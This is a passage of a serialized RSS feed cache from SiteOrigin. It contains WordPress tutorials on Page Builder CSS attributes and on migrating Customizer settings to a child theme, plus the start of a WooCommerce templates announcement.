Attributes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"https://siteorigin.com/custom-css-guide-page-builder-row-cell-widget-attributes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"https://siteorigin.com/custom-css-guide-page-builder-row-cell-widget-attributes/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 29 Nov 2019 12:59:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Tutorial\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"tutorial\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://siteorigin.com/?p=205410\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:729:\"<p>Custom CSS is a quick and accessible method for hobbyists and developers to make style changes beyond what can be done using available settings. In this tutorial, we\'ll cover the Page Builder Attributes tab and how it can be used when making Custom CSS changes. This brief guide is aimed at users with a basic understanding of CSS or those wanting to go beyond using the Visual Editor in <a href=\"http://siteorigin.com/css\">SiteOrigin CSS</a>.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/custom-css-guide-page-builder-row-cell-widget-attributes/\">A Custom CSS Guide to Page Builder Row, Cell &#038; Widget Attributes</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Andrew Misplon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:16248:\"<p>Custom CSS is a quick and accessible method for hobbyists and developers to make style changes beyond what can be done using available settings. In this tutorial, we&#8217;ll cover the Page Builder Attributes tab and how it can be used when making Custom CSS changes. This brief guide is aimed at users with a basic understanding of CSS or those wanting to go beyond using the Visual Editor in <a href=\"http://siteorigin.com/css\">SiteOrigin CSS</a>.</p>\n<p>The Attributes tab is available when editing Page Builder rows, cells, and widgets.</p>\n<h2>Row Attributes</h2>\n<p>To edit a Page Builder row, hover over the spanner icon on the right and click <span class=\"adminized-section\"><span class=\"adminized-part\">Edit Row</span></span>. Click the Attributes heading on the right to open the panel.</p>\n<div id=\"attachment_209308\" style=\"width: 248px\" class=\"wp-caption alignnone\"><img aria-describedby=\"caption-attachment-209308\" loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/11/row-attributes-238x300.png\" alt=\"\" width=\"238\" height=\"300\" class=\"size-medium wp-image-209308\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/11/row-attributes-238x300.png 238w, https://siteorigin.com/wp-content/uploads/2019/11/row-attributes-554x699.png 554w, https://siteorigin.com/wp-content/uploads/2019/11/row-attributes-313x395.png 313w, https://siteorigin.com/wp-content/uploads/2019/11/row-attributes.png 580w\" sizes=\"(max-width: 238px) 100vw, 238px\" /></p>\n<p id=\"caption-attachment-209308\" class=\"wp-caption-text\">Row Attributes.</p>\n</div>\n<p>The following fields are available.</p>\n<h4>Row ID</h4>\n<p>A custom ID that&#8217;ll be applied to the row. Only the ID name should be inserted, the preceding hash normally used shouldn&#8217;t be inserted. For example, if the custom row ID was named &#8220;services&#8221;, only insert the word <code>services</code>. Keep in mind that an ID name should only be used once.</p>\n<div id=\"attachment_209296\" style=\"width: 310px\" class=\"wp-caption alignnone\"><img aria-describedby=\"caption-attachment-209296\" loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/11/row-id-300x142.png\" alt=\"\" width=\"300\" height=\"142\" class=\"size-medium wp-image-209296\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/11/row-id-300x142.png 300w, https://siteorigin.com/wp-content/uploads/2019/11/row-id-313x149.png 313w, https://siteorigin.com/wp-content/uploads/2019/11/row-id.png 548w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></p>\n<p id=\"caption-attachment-209296\" class=\"wp-caption-text\">Row ID.</p>\n</div>\n<p>The row ID will be output into the Page Builder markup as follows:</p>\n<p><img loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/11/row-id-699x158.gif\" alt=\"\" width=\"699\" height=\"158\" class=\"alignnone size-large wp-image-209546\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/11/row-id-699x158.gif 699w, https://siteorigin.com/wp-content/uploads/2019/11/row-id-300x68.gif 300w, https://siteorigin.com/wp-content/uploads/2019/11/row-id-768x174.gif 768w, https://siteorigin.com/wp-content/uploads/2019/11/row-id-1050x238.gif 1050w, https://siteorigin.com/wp-content/uploads/2019/11/row-id-313x71.gif 313w\" sizes=\"(max-width: 699px) 100vw, 699px\" /></p>\n<h4>Row Class</h4>\n<p>A custom class that&#8217;ll be applied to the row. Only the class name should be inserted, the preceding period normally used shouldn&#8217;t be inserted. For example, if the custom row class was named &#8220;drop-shadow&#8221;, only insert the word <code>drop-shadow</code>.</p>\n<div id=\"attachment_209299\" style=\"width: 310px\" class=\"wp-caption alignnone\"><img aria-describedby=\"caption-attachment-209299\" loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/11/row-class-300x94.png\" alt=\"\" width=\"300\" height=\"94\" class=\"size-medium wp-image-209299\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/11/row-class-300x94.png 300w, https://siteorigin.com/wp-content/uploads/2019/11/row-class-313x98.png 313w, https://siteorigin.com/wp-content/uploads/2019/11/row-class.png 554w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></p>\n<p id=\"caption-attachment-209299\" class=\"wp-caption-text\">Row Class.</p>\n</div>\n<p>The row class will be output into the Page Builder markup as follows:</p>\n<p><img loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/11/row-class-1-699x148.png\" alt=\"\" width=\"699\" height=\"148\" class=\"alignnone size-large wp-image-210495\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/11/row-class-1-699x148.png 699w, https://siteorigin.com/wp-content/uploads/2019/11/row-class-1-300x64.png 300w, https://siteorigin.com/wp-content/uploads/2019/11/row-class-1-768x163.png 768w, https://siteorigin.com/wp-content/uploads/2019/11/row-class-1-1050x223.png 1050w, https://siteorigin.com/wp-content/uploads/2019/11/row-class-1-313x66.png 313w, https://siteorigin.com/wp-content/uploads/2019/11/row-class-1.png 1287w\" sizes=\"(max-width: 699px) 100vw, 699px\" /></p>\n<h4>Cell Class</h4>\n<p>A custom class that&#8217;ll be applied to each cell in the row. Only the class name should be inserted, the preceding period normally used shouldn&#8217;t be inserted. For example, if the custom row class was named &#8220;dark-bg&#8221;, only insert the word <code>dark-bg</code>.</p>\n<div id=\"attachment_209306\" style=\"width: 310px\" class=\"wp-caption alignnone\"><img aria-describedby=\"caption-attachment-209306\" loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/11/cell-class-1-300x96.png\" alt=\"\" width=\"300\" height=\"96\" class=\"size-medium wp-image-209306\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/11/cell-class-1-300x96.png 300w, https://siteorigin.com/wp-content/uploads/2019/11/cell-class-1-313x100.png 313w, https://siteorigin.com/wp-content/uploads/2019/11/cell-class-1.png 552w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></p>\n<p id=\"caption-attachment-209306\" class=\"wp-caption-text\">Cell Class.</p>\n</div>\n<p>The row class will be output into the Page Builder markup as follows:</p>\n<p><img loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/11/cell-class-2-699x220.png\" alt=\"\" width=\"699\" height=\"220\" class=\"alignnone size-large wp-image-210497\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/11/cell-class-2-699x220.png 699w, https://siteorigin.com/wp-content/uploads/2019/11/cell-class-2-300x94.png 300w, https://siteorigin.com/wp-content/uploads/2019/11/cell-class-2-768x241.png 768w, https://siteorigin.com/wp-content/uploads/2019/11/cell-class-2-1050x330.png 1050w, https://siteorigin.com/wp-content/uploads/2019/11/cell-class-2-313x98.png 313w, https://siteorigin.com/wp-content/uploads/2019/11/cell-class-2.png 1308w\" sizes=\"(max-width: 699px) 100vw, 699px\" /></p>\n<p>For those new to CSS, the above three fields would be used in conjunction with a plugin like <a href=\"http://siteorigin.com/css\">SiteOrigin CSS</a> or the core field at <span class=\"adminized-section\"><span class=\"adminized-part\">Customize</span><span class=\"adminized-arrow icon-arrow-right\"></span><span class=\"adminized-part\">Additional CSS</span></span>. Once the ID or class name you require has been inserted in one of the above fields you&#8217;d then head over to <span class=\"adminized-section\"><span class=\"adminized-part\">Appearance</span><span class=\"adminized-arrow icon-arrow-right\"></span><span class=\"adminized-part\">Custom CSS</span></span> to create a rule targetted at the ID or class name you&#8217;ve inserted.</p>\n<p>A rule targetting our example row ID would look as follows:</p>\n<pre class=\"prettyprint \">#services {\r\n	&#47;* Declarations go here *&#47;\r\n}</pre>\n<p>A rule targetting our example row class would look as follows:</p>\n<pre class=\"prettyprint \">.drop-shadow {\r\n	&#47;* Declarations go here *&#47;\r\n}</pre>\n<p>A rule targetting our example cell class would look as follows:</p>\n<pre class=\"prettyprint \">.dark-bg {\r\n	&#47;* Declarations go here *&#47;\r\n}</pre>\n<h4>CSS Styles</h4>\n<p>The CSS Styles field allows for style declarations to be applied to the row. A CSS declaration is made up a property and a value, for example <code>font-size: 20px</code>. <code>font-size</code> is the property and <code>20px</code> is the value. One declaration should be added per line. The semi-colon that would normally be used at the end of each declaration isn&#8217;t necessary.</p>\n<div id=\"attachment_210502\" style=\"width: 310px\" class=\"wp-caption alignnone\"><img aria-describedby=\"caption-attachment-210502\" loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/11/css-styles-300x148.png\" alt=\"\" width=\"300\" height=\"148\" class=\"size-medium wp-image-210502\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/11/css-styles-300x148.png 300w, https://siteorigin.com/wp-content/uploads/2019/11/css-styles-313x154.png 313w, https://siteorigin.com/wp-content/uploads/2019/11/css-styles.png 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></p>\n<p id=\"caption-attachment-210502\" class=\"wp-caption-text\">CSS Styles field.</p>\n</div>\n<p>The declarations displayed in the above screenshot will be output as follows:</p>\n<p><a href=\"https://siteorigin.com/wp-content/uploads/2019/11/css-styles-output.png\" rel=\"noopener noreferrer\" target=\"_blank\"><img loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/11/css-styles-output.png\" alt=\"\" width=\"2362\" height=\"450\" class=\"alignnone size-full wp-image-210505\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/11/css-styles-output.png 2362w, https://siteorigin.com/wp-content/uploads/2019/11/css-styles-output-300x57.png 300w, https://siteorigin.com/wp-content/uploads/2019/11/css-styles-output-699x133.png 699w, https://siteorigin.com/wp-content/uploads/2019/11/css-styles-output-768x146.png 768w, https://siteorigin.com/wp-content/uploads/2019/11/css-styles-output-1536x293.png 1536w, https://siteorigin.com/wp-content/uploads/2019/11/css-styles-output-2048x390.png 2048w, https://siteorigin.com/wp-content/uploads/2019/11/css-styles-output-1050x200.png 1050w, https://siteorigin.com/wp-content/uploads/2019/11/css-styles-output-313x60.png 313w\" sizes=\"(max-width: 2362px) 100vw, 2362px\" /></a></p>\n<h4>Mobile CSS Styles</h4>\n<p>Mobile CSS Styles will only be applied to screen resolutions below the mobile resolution set at <span class=\"adminized-section\"><span class=\"adminized-part\">Settings</span><span class=\"adminized-arrow icon-arrow-right\"></span><span class=\"adminized-part\">Page Builder</span><span class=\"adminized-arrow icon-arrow-right\"></span><span class=\"adminized-part\">Layout</span><span class=\"adminized-arrow icon-arrow-right\"></span><span class=\"adminized-part\">Mobile Width</span></span>.</p>\n<div id=\"attachment_210566\" style=\"width: 310px\" class=\"wp-caption alignnone\"><img aria-describedby=\"caption-attachment-210566\" loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/11/mobile-css-styles-300x148.png\" alt=\"\" width=\"300\" height=\"148\" class=\"size-medium wp-image-210566\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/11/mobile-css-styles-300x148.png 300w, https://siteorigin.com/wp-content/uploads/2019/11/mobile-css-styles-313x154.png 313w, https://siteorigin.com/wp-content/uploads/2019/11/mobile-css-styles.png 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></p>\n<p id=\"caption-attachment-210566\" class=\"wp-caption-text\">Mobile CSS Styles</p>\n</div>\n<p>The declaration displayed in the above screenshot will be output as follows:</p>\n<p><a href=\"https://siteorigin.com/wp-content/uploads/2019/11/mobile-cell-styles.png\"><img loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/11/mobile-cell-styles.png\" alt=\"\" width=\"2283\" height=\"447\" class=\"alignnone size-full wp-image-210574\" target=\"_blank\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/11/mobile-cell-styles.png 2283w, https://siteorigin.com/wp-content/uploads/2019/11/mobile-cell-styles-300x59.png 300w, https://siteorigin.com/wp-content/uploads/2019/11/mobile-cell-styles-699x137.png 699w, https://siteorigin.com/wp-content/uploads/2019/11/mobile-cell-styles-768x150.png 768w, https://siteorigin.com/wp-content/uploads/2019/11/mobile-cell-styles-1536x301.png 1536w, https://siteorigin.com/wp-content/uploads/2019/11/mobile-cell-styles-2048x401.png 2048w, https://siteorigin.com/wp-content/uploads/2019/11/mobile-cell-styles-1050x206.png 1050w, https://siteorigin.com/wp-content/uploads/2019/11/mobile-cell-styles-313x61.png 313w\" sizes=\"(max-width: 2283px) 100vw, 2283px\" /></a></p>\n<h2>Cell Attributes</h2>\n<p>When editing a Page Builder row you can reveal the relevant Cell Styles field by clicking on the cell you&#8217;d like to edit. Click the Attributes heading on the right to open the panel.</p>\n<div id=\"attachment_210755\" style=\"width: 2019px\" class=\"wp-caption alignnone\"><a href=\"https://siteorigin.com/wp-content/uploads/2019/11/cell-styles.png\"><img aria-describedby=\"caption-attachment-210755\" loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/11/cell-styles.png\" alt=\"\" width=\"2009\" height=\"1044\" class=\"size-full wp-image-210755\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/11/cell-styles.png 2009w, https://siteorigin.com/wp-content/uploads/2019/11/cell-styles-300x156.png 300w, https://siteorigin.com/wp-content/uploads/2019/11/cell-styles-699x363.png 699w, https://siteorigin.com/wp-content/uploads/2019/11/cell-styles-768x399.png 768w, https://siteorigin.com/wp-content/uploads/2019/11/cell-styles-1536x798.png 1536w, https://siteorigin.com/wp-content/uploads/2019/11/cell-styles-1050x546.png 1050w, https://siteorigin.com/wp-content/uploads/2019/11/cell-styles-313x163.png 313w\" sizes=\"(max-width: 2009px) 100vw, 2009px\" /></a></p>\n<p id=\"caption-attachment-210755\" class=\"wp-caption-text\">Click on the cell you&#8217;d like to edit to reveal the Cell Styles section.</p>\n</div>\n<p>The following fields are available.</p>\n<ul>\n<li>Cell ID</li>\n<li>Cell Class</li>\n<li>CSS Styles</li>\n<li>Mobile CSS Styles</li>\n</ul>\n<p>Cell attributes function in the same way as row attributes just targetted at the cell in question.</p>\n<h2>Widget Attributes</h2>\n<p>The Widget Styles panel is available on the right when editing any widget in Page Builder. Click the Attributes heading to open the panel.</p>\n<div id=\"attachment_210765\" style=\"width: 310px\" class=\"wp-caption alignnone\"><a href=\"https://siteorigin.com/wp-content/uploads/2019/11/widget-styles.png\"><img aria-describedby=\"caption-attachment-210765\" loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2019/11/widget-styles-300x278.png\" alt=\"\" width=\"300\" height=\"278\" class=\"size-medium wp-image-210765\" srcset=\"https://siteorigin.com/wp-content/uploads/2019/11/widget-styles-300x278.png 300w, https://siteorigin.com/wp-content/uploads/2019/11/widget-styles-313x290.png 313w, https://siteorigin.com/wp-content/uploads/2019/11/widget-styles.png 563w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a></p>\n<p id=\"caption-attachment-210765\" class=\"wp-caption-text\">Click the Attributes heading in the Widget Styles panel to access widget level attribute fields.</p>\n</div>\n<p>The following fields are available.</p>\n<ul>\n<li>Widget ID</li>\n<li>Cell Class</li>\n<li>CSS Styles</li>\n<li>Mobile CSS Styles</li>\n</ul>\n<p>Widget attributes function in the same way as row and cell attributes just targetted at the widget in question.</p>\n<p>Thanks for reading, hopefully, you now have an overview of how row, cell and widget attributes can be used. If you have any questions or comments, please, let us know in the comments section below.</p>\n<h3>Do More with SiteOrigin Premium</h3>\n<p><a href=\"https://siteorigin.com/downloads/premium/\">SiteOrigin Premium</a> offers a huge array of additional functionality for Page Builder by SiteOrigin, the SiteOrigin Widgets Bundle, SiteOrigin CSS and all of our themes. SiteOrigin Premium also includes access to our next-level email support service, perfect for those times when you need fast and effective technical support.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/custom-css-guide-page-builder-row-cell-widget-attributes/\">A Custom CSS Guide to Page Builder Row, Cell &#038; Widget Attributes</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://siteorigin.com/custom-css-guide-page-builder-row-cell-widget-attributes/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"26\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:76:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"Migrating Parent to Child Theme Customizer Settings\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://siteorigin.com/migrating-parent-child-customizer-settings/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://siteorigin.com/migrating-parent-child-customizer-settings/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 14 Aug 2019 14:47:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Tutorial\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"tutorial\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://siteorigin.com/?p=191325\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:728:\"<p>A child theme ensures that your code-level customizations are kept safe and not overwritten during the theme update process. If you think you might need to make code-level customizations in the future, it\'s best to make use of a child theme from the beginning of your WordPress site\'s development. In this tutorial, we\'ll look at what happens to your Customizer settings when switching to a child theme late in the development process and how to quickly resolve the problem.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/migrating-parent-child-customizer-settings/\">Migrating Parent to Child Theme Customizer Settings</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Andrew Misplon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3482:\"<p>A child theme ensures that your code-level customizations are kept safe and not overwritten during the theme update process. If you think you might need to make code-level customizations in the future, it&#8217;s best to make use of a child theme from the beginning of your WordPress site&#8217;s development. In this tutorial, we&#8217;ll look at what happens to your Customizer settings when switching to a child theme late in the development process and how to quickly resolve the problem using <a href=\"https://wordpress.org/plugins/customizer-export-import/\">Customizer Export/Import</a>.</p>\n<h3>Customizer Settings and Your Activated Theme</h3>\n<p>Customizer settings are safely stored in the database with each theme storing its own collection of settings. Just as with any other theme, a child theme has its own collection of settings stored in the database. When switching from your parent theme to a child theme for the first time, your Customizer settings will reset to their default values. This is no problem if you’re installing a child theme at the start of your site’s development. However, if you’ve already set up menus, backgrounds and a long list of theme settings, this is a big time waster.</p>\n<h3>Migrating Customizer Settings from the Parent to a Child Theme</h3>\n<p>Go to <span class=\"adminized-section\"><span class=\"adminized-part\">Plugins</span><span class=\"adminized-arrow icon-arrow-right\"></span><span class=\"adminized-part\">Add New</span></span>, search for and install <span class=\"adminized-section\"><span class=\"adminized-part\">Customizer Export/Import</span></span> plugin. </p>\n<p>With your parent theme activated go to <span class=\"adminized-section\"><span class=\"adminized-part\">Customize</span><span class=\"adminized-arrow icon-arrow-right\"></span><span class=\"adminized-part\">Export/Import</span></span>. Click the Export button which will download a <code>.dat</code> file to your desktop or downloads folder.</p>\n<p>Assuming your child theme has already been installed, go to <span class=\"adminized-section\"><span class=\"adminized-part\">Appearance</span><span class=\"adminized-arrow icon-arrow-right\"></span><span class=\"adminized-part\">Themes</span></span> or <span class=\"adminized-section\"><span class=\"adminized-part\">Appearance</span><span class=\"adminized-arrow icon-arrow-right\"></span><span class=\"adminized-part\">Customize</span></span> and activate it.</p>\n<p>With your child theme activated, go to <span class=\"adminized-section\"><span class=\"adminized-part\">Customize</span><span class=\"adminized-arrow icon-arrow-right\"></span><span class=\"adminized-part\">Export/Import</span></span>, under the Import heading, click the Choose File button, select the <code>.dat</code> file you downloaded in step two, enable the import images option and click Import.</p>\n<h3>Do More with SiteOrigin Premium</h3>\n<p><a href=\"https://siteorigin.com/downloads/premium/\">SiteOrigin Premium</a> offers a huge array of additional functionality for Page Builder by SiteOrigin, the SiteOrigin Widgets Bundle and all of our themes. SiteOrigin Premium also includes access to our next-level email support service, perfect for those times when you need fast and effective technical support.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/migrating-parent-child-customizer-settings/\">Migrating Parent to Child Theme Customizer Settings</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://siteorigin.com/migrating-parent-child-customizer-settings/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"19\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:73:\"\n		\n		\n					\n		\n		\n		\n				\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"Create WooCommerce Templates with Page Builder\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://siteorigin.com/woocommerce-templates-page-builder/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://siteorigin.com/woocommerce-templates-page-builder/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 07 Aug 2019 14:25:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Announcements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://siteorigin.com/?p=190344\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:690:\"<p>Take control of your WooCommerce layouts with Page Builder. <a href=\"https://siteorigin.com/downloads/premium/\">SiteOrigin Premium</a> version <code>1.10.0</code> includes our new WooCommerce Templates addon which allows you to build custom Page Builder templates for the Product, Archives, Shop, Cart, Empty Cart, Checkout and My Account pages. Reorganize existing WooCommerce content or add new content, all in the familiar Page Builder interface.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/woocommerce-templates-page-builder/\">Create WooCommerce Templates with Page Builder</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Andrew 